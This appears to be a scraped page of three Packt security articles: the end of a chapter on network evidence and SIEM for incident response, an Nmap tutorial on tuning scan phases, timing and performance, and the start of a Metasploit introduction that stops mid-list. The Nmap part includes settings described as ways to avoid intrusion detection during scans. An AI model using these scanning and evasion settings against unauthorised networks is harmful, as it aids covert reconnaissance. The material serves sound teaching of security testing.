Switches: These are spread throughout a network as a combination of core switches that handle traffic from a range of network segments and edge switches that handle the traffic for individual segments. As a result, traffic that originates on a host and travels out of the internal network will traverse a number of switches. Switches have two key points of evidence that should be addressed by incident responders. The first is the Content Addressable Memory (CAM) table. The CAM table maps the physical ports on the switch to the Network Interface Card (NIC) of each device connected to the switch. Incident responders can utilize this information when tracing connections to specific network jacks, which can aid in the identification of possible rogue devices. The second way switches can aid in an incident investigation is by facilitating network traffic capture.
Routers: Routers allow organizations to connect multiple LANs into Metropolitan Area Networks or Wide Area Networks. As a result, they handle an extensive amount of traffic. The key piece of evidentiary information that routers contain is the routing table, which holds the information for the specific physical ports that map to the networks. Routers can also be configured to deny specific traffic between networks and to maintain logs on allowed traffic and data flow.
Firewalls: Firewalls have changed significantly since the days when they were considered just a different type of router. Next-generation firewalls contain a wide variety of features such as intrusion detection and prevention, web filtering, data loss prevention, and detailed logs about allowed and denied traffic. Firewalls oftentimes serve as the detection mechanism that alerts security personnel to potential incidents. Incident responders should have as much visibility as possible into how their organization's firewalls function and what data can be obtained prior to an incident.
Network Intrusion Detection and Prevention systems: These systems were purposefully designed to provide security personnel and incident responders with information concerning potential malicious activity on the network infrastructure. They utilize a combination of network monitoring and rule sets to determine whether there is malicious activity. Intrusion Detection Systems are often configured to alert on specific malicious activity, while Intrusion Prevention Systems can not only detect but also block potential malicious activity. In either case, both types of platforms' logs are an excellent place for incident responders to locate specific evidence of malicious activity.
Web proxy servers: Organizations often utilize web proxy servers to control how users interact with websites and other internet-based resources. As a result, these devices can give an enterprise-wide picture of web traffic that both originates from and is destined for internal hosts. Web proxies also have the additional feature of alerting on connections to known malware Command and Control (C2) servers or websites that serve up malware. A review of web proxy logs in conjunction with a possibly compromised host may identify a source of malicious traffic or a C2 server exerting control over the host.
Domain controllers / authentication servers: Serving the entire network domain, authentication servers are the primary location that incident responders can leverage for details on successful or unsuccessful logins, credential manipulation, or other credential use.
DHCP server: Maintaining a static list of assigned IP addresses for workstations or laptops within the organization would require an inordinate amount of upkeep. The Dynamic Host Configuration Protocol allows for the dynamic assignment of IP addresses to systems on the LAN. DHCP servers often contain logs of the assignment of IP addresses mapped to the MAC address of the host's NIC. This becomes important if an incident responder has to track down a specific workstation or laptop that was connected to the network at a specific date and time.
Application servers: A wide range of applications, from email to web applications, is housed on network servers. Each of these can provide logs specific to the type of application.

Network devices such as switches, routers, and firewalls also have their own internal logs that maintain data on access and changes. Incident responders should become familiar with the types of network devices on their organization's network and be able to access these logs in the event of an incident.

Security Information and Event Management systems

A significant challenge that a great many organizations have is the nature of logging on network devices. With limited space, log files are often rolled over, with new log files written over older ones. The result is that, in some cases, an organization may only have a few days, or even a few hours, of important logs. If a potential incident happened several weeks ago, the incident response personnel will be without critical pieces of evidence.

One tool that has been embraced by a number of enterprises is a Security Information and Event Management (SIEM) system. These appliances have the ability to aggregate log and event data from network sources and combine them into a single location. This allows the CSIRT and other security personnel to observe activity across the entire network without having to examine individual systems.
The diagram below illustrates how a SIEM integrates into the overall network: a variety of sources, from security controls to SQL databases, are configured to send logs to the SIEM. In this case, the SQL database located at 10.100.20.18 indicates that the user account USSalesSyncAcct was utilized to copy a database to the remote host located at 10.88.6.12. The SIEM allows for quick examination of this type of activity. For example, if it is determined that the account USSalesSyncAcct has been compromised, CSIRT analysts can quickly query the SIEM for any usage of that account. From there, they would be able to see the log entry that indicated a copy of a database to the remote host. Without the SIEM, CSIRT analysts would have to search each individual system that might have been accessed, a process that may be prohibitive.

From the SIEM platform, security and network analysts have the ability to perform a number of different tasks related to incident response:

Log aggregation: Typical enterprises have several thousand devices within the internal network, each with its own logs; the SIEM can be deployed to aggregate these logs in a central location.
Log retention: Another key feature that SIEM platforms provide is a place to retain logs. Compliance frameworks such as the Payment Card Industry Data Security Standard (PCI-DSS) stipulate that logs should be maintained for a period of one year, with 90 days immediately available. SIEM platforms can aid with log management by providing a system that archives logs in an orderly fashion and allows for immediate retrieval.
Routine analysis: It is advisable with a SIEM platform to conduct periodic reviews of the information. SIEM platforms often provide a dashboard that highlights key elements such as the number of connections, data flow, and any critical alerts. SIEMs also allow for reporting so that stakeholders can be kept informed of activity.
Alerting: SIEM platforms have the ability to alert on specific conditions that may indicate malicious activity. This can include alerts from security controls such as anti-virus, intrusion prevention, or intrusion detection systems. Another key feature of SIEM platforms is event correlation. This technique examines the log files and determines whether there is a link or any commonality between the events. The SIEM then has the capability to alert on these types of events. For example, if a user account attempts multiple logins across a number of systems in the enterprise, the SIEM can identify that activity and alert on it.
Incident response: As the SIEM becomes the single point for log aggregation and analysis, CSIRT analysts will often make use of the SIEM during an incident, running queries on the platform as well as downloading logs for offline analysis. Because of the centralization of log files, the time needed to conduct searches and event collection is significantly reduced. For example, suppose a CSIRT analyst has indicated that a user account has been compromised. Without a SIEM, the analyst would have to check various systems for any activity pertaining to that user account. With a SIEM in place, the analyst simply conducts a search for that user account on the SIEM platform, which has aggregated user account activity from logs from systems all over the enterprise. The result is that the analyst has a clear idea of the user account activity in a fraction of the time it would have taken to examine logs from various systems throughout the enterprise.
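To make the value of centralization concrete, here is a deliberately simplified stand-in for the SIEM query described above: a plain text search across logs that have already been forwarded to one collection point. The path is hypothetical and the account name is taken from the example above; a real SIEM exposes the same idea through its own query interface and adds parsing, correlation, and alerting on top.

# one search over centrally collected logs covers the whole enterprise
grep -ri "USSalesSyncAcct" /var/log/central/ | less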
SIEM platforms do entail a good deal of time and money to purchase and implement. Adding to that cost is the constant upkeep, maintenance, and modification of rules that is necessary. From an incident response perspective, though, a properly configured and maintained SIEM is vital to gathering network-based evidence in a timely manner. In addition, the features and capabilities of SIEM platforms can significantly reduce the time it takes to determine the root cause of an incident once it has been detected. The following article has an excellent breakdown and use cases of SIEM platforms in enterprise environments: https://gbhackers.com/security-information-and-event-management-siem-a-detailed-explanation/.

Security Onion

Full-featured SIEM platforms may be cost prohibitive for some organizations. One option that is available is the open source platform Security Onion. Security Onion ties a wide range of security tools, such as OSSEC, Suricata, and Snort, into a single platform. It also has features such as dashboards and tools for deep analysis of log files. For example, the following screenshot shows the level of detail available:

Although installing and deploying Security Onion may require some investment of time, it is a powerful, low-cost alternative, providing a solution for organizations that cannot deploy a full-featured SIEM. (The Security Onion platform and associated documentation are available at https://securityonion.net/.)

Summary

Evidence that is pertinent to incident responders is not located only on the hard drive of a compromised host. There is a wealth of information available from network devices spread throughout the environment. With proper preparation, a CSIRT may be able to leverage the evidence provided by these devices through solutions such as a SIEM. CSIRT personnel also have the ability to capture network traffic for later analysis through a variety of methods and tools. Behind all of these techniques, though, are the legal and policy implications that CSIRT personnel and the organization at large need to navigate. By preparing for the legal and technical challenges of network evidence collection, CSIRT members can leverage this evidence and move closer to the goal of determining the root cause of an incident and bringing the organization back up to operations.

Resources for Article: Further resources on this subject: Selecting and Analyzing Digital Evidence [article] Digital and Mobile Forensics [article] BackTrack Forensics [article]
To Optimize Scans

Packt
23 Jun 2017
20 min read
In this article by Paulino Calderon Pale, author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics:

Skipping phases to speed up scans
Selecting the correct timing template
Adjusting timing parameters
Adjusting performance parameters

(For more resources related to this topic, see here.)

One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful, understand the configuration options and scanning phases that can affect performance, and, most importantly, really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets.

This article starts by introducing the different scanning phases, timing, and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can improve not only performance but accuracy as well. Maybe those targets marked as offline were simply too slow to respond to the probes sent, after all.

Skipping phases to speed up scans

Nmap scans can be broken into phases. When we are working with many hosts, we can save time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans. This section explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans.

How to do it...

To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command:

# nmap -T4 -n -Pn -p- 74.207.244.221

Note the scanning time at the end of the report:

Nmap scan report for 74.207.244.221
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
9929/tcp open nping-echo
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

Now, compare the running time that we get if we don't skip any tests:

# nmap -p- scanme.nmap.org

Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
9929/tcp open nping-echo
Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds

Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, and consider the possibility of skipping some of the scanning phases that we will describe next.

How it works...

Nmap scans are divided into several phases. Some of them require arguments to be set in order to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flags:

Target enumeration: In this phase, Nmap parses the target list.
This phase can't exactly be skipped, but you can save DNS forward lookups using only the IP addresses as targets. Host discovery: This is the phase where Nmap establishes if the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined. To skip the host discovery phase (no ping), use the flag -Pn. And we can easily see what probes we skipped by comparing the packet trace of the two scans: $ nmap -Pn -p80 -n --packet-trace scanme.nmap.org SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460> RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds For scanning without skipping host discovery, we use the command: $ nmap -p80 -n --packet-trace scanme.nmap.orgSENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28 SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460> SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024 SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40 RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28 SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460> RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds Reverse DNS resolution: Host names often reveal by themselves additional information and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments. Let's see the traffic generated by the two scans with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to your command: $ nmap -n -Pn -p80 --packet-trace scanme.nmap.orgSENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460> RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). 
PORT   STATE SERVICE 80/tcp open http   Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds And if we try the same command but not' skipping reverse DNS resolution, as follows: $ nmap -Pn -p80 --packet-trace scanme.nmap.org NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 18 NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID                                                 34 NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID                                                 50 NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]:                                                 =............221.244.207.74.in-addr.arpa..... NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 66 NSOCK (0.0620s) nsi_delete() (IOD #1) NSOCK (0.0620s) msevent_cancel() on event #66 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #2) NSOCK (0.0620s) msevent_cancel() on event #34 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #3) NSOCK (0.0620s) msevent_cancel() on event #50 (type READ) SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 ip                                                 len=44 seq=1992555555 win=1024 <mss 1460> RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen                                                =44 seq=4229796359 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN/TCP Connect scanning depending on the user privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them like resolving their DNS names or checking whether they are online. 
For this reason, this phase can be skipped with the argument -sn: $ nmap -sn -R --packet-trace 74.207.244.221 SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28 SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460> SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024 SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40 RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0 NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18 NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34 NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50 NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa..... NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66 NSOCK (0.1660s) nsi_delete() (IOD #1) NSOCK (0.1660s) msevent_cancel() on event #66 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #2) NSOCK (0.1660s) msevent_cancel() on event #34 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #3) NSOCK (0.1660s) msevent_cancel() on event #50 (type READ) Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (We forced DNS lookups with the option -R), but no port scanning was done. There's more... I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command: # nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or scan the port and only perform a reverse DNS lookup: $ nmap -R -Pn -sn 74.207.244.221 Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Selecting the correct timing template Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network condition. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint Nmap about the speed of your network connection and the target's response time. 
The following will teach you about Nmap's timing templates and how to choose the more appropriate one. How to do it... Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what Nmap option -T4 sets: # nmap -T4 -d 192.168.4.20 --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- <Scan output removed for clarity> You may use the integers between 0 and 5, for example,-T[0-5]. How it works... The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments. The available timing templates and their initial configuration values are as follows: Paranoid(-0)—This template is useful to avoid detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 300000, min 100, max 300000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Sneaky (-1)—This template is useful for avoiding detection systems but is still very slow: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 15000, min 100, max 15000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Polite (-2)—This template is used when scanning is not supposed to interfere with the target system, very conservative and safe setting: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Normal (-3)—This is Nmap's default timing template, which is used when the argument -T is not set: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Aggressive (-4)—This is the recommended timing template for broadband and Ethernet connections: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Insane (-5)—This timing template sacrifices accuracy for speed: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 250, min 50, max 300 max-scan-delay: TCP 5, UDP 1000, SCTP 5 parallelism: min 0, max 0 max-retries: 2, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- There's more... An interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. 
Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list; so far, this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values(--max-rateand --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. Adjusting timing parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it can be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap. How to do it... Enter the following command to adjust the initial round trip timeout, the delay between probes and a time out for each scanned host: # nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 150, min 100, max 1250 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 6, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- How it works... Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine closer each timing parameter and learn its Nmap option parameter name. The Round Trip Time (RTT) value is used by Nmap to know when to give up or retransmit a probe response. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command: # nmap -A -p- --initial-rtt-timeout 150ms <target> In addition, you can set the minimum and maximum RTT timeout values with--min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command: # nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target> Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and maximum amount of time allowed to wait between probes, respectively, as shown in the following commands: # nmap -A --max-scan-delay 10s scanme.nmap.org # nmap -A --scan-delay 1s scanme.nmap.org Note that the arguments previously shown are very useful when avoiding detection mechanisms. Be careful not to set --max-scan-delay too low because it will most likely miss the ports that are open. There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout: # nmap -sV -A -p- --host-timeout 5m <target> Estimating round trip times with Nping To use Nping to estimate the round trip time taken between the target and you, the following command can be used: # nping -c30 <target> This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained: # nping -c30 scanme.nmap.org ... 
SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28
RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28
Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms
Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%)
Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03
Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00
Nping done: 1 IP address pinged in 30.47 seconds

Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for --initial-rtt-timeout, and as high as four times the maximum round trip time value for --max-rtt-timeout.

Displaying the timing settings

Enable debugging to make Nmap inform you about the timing settings before scanning:

$ nmap -d <target>
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix, Scanning Phases, for more information.

Adjusting performance parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect its behavior, such as the number of hosts scanned concurrently, the number of retries, and the number of allowed probes. Learning how to adjust these parameters properly can reduce a lot of your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance.

How to do it...

Enter the following command, adjusting the values for your target condition:

$ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

How it works...

The command shown previously tells Nmap to scan and report by grouping no fewer than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2):

# nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

It is important to note that setting these values incorrectly will most likely hurt performance or accuracy rather than improve them. Nmap sends many probes during its port scanning phase due to the ambiguity of what a lack of response means: either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on the network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind that this sacrifices speed:

$ nmap --max-retries 10 <target>

The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often you would like to see the scan results. Larger groups are optimal to improve performance, but you may prefer smaller host groups on slow networks:

# nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target>

There is also a very important argument that can be used to limit the number of packets sent per second by Nmap.
The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present:

# nmap -A -p- --min-rate 50 --max-rate 100 <target>

Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically:

# nmap -A --max-parallelism 1 <target>
# nmap -A --min-parallelism 10 --max-parallelism 250 <target>

There's more...

If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command:

# nmap -sV -A -p- --host-timeout 5m <target>

Interactive mode in Nmap allows users to press keys to dynamically change runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times on the development mailing list, so far this hasn't been implemented. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix, Scanning Phases, for more information.

Summary

In this article, we learned how to implement and optimize scans, allowing us to save time and make better use of the available bandwidth and CPU resources. This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters!

Resources for Article:

Further resources on this subject: Introduction to Network Security, Implementing OpenStack Networking and Security, Communication and Network Security
Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. 
This interface is also considered one of the most stable interfaces. The command-line interface: This is the most potent interface, which supports everything from launching exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting language.

Basics of Metasploit framework

Before we put our hands onto the Metasploit framework, let us understand the basic terminologies used in Metasploit. However, the following are not just terminologies but modules that are the heart and soul of the Metasploit project:

Exploit: This is a piece of code which, when executed, will trigger the vulnerability at the target.
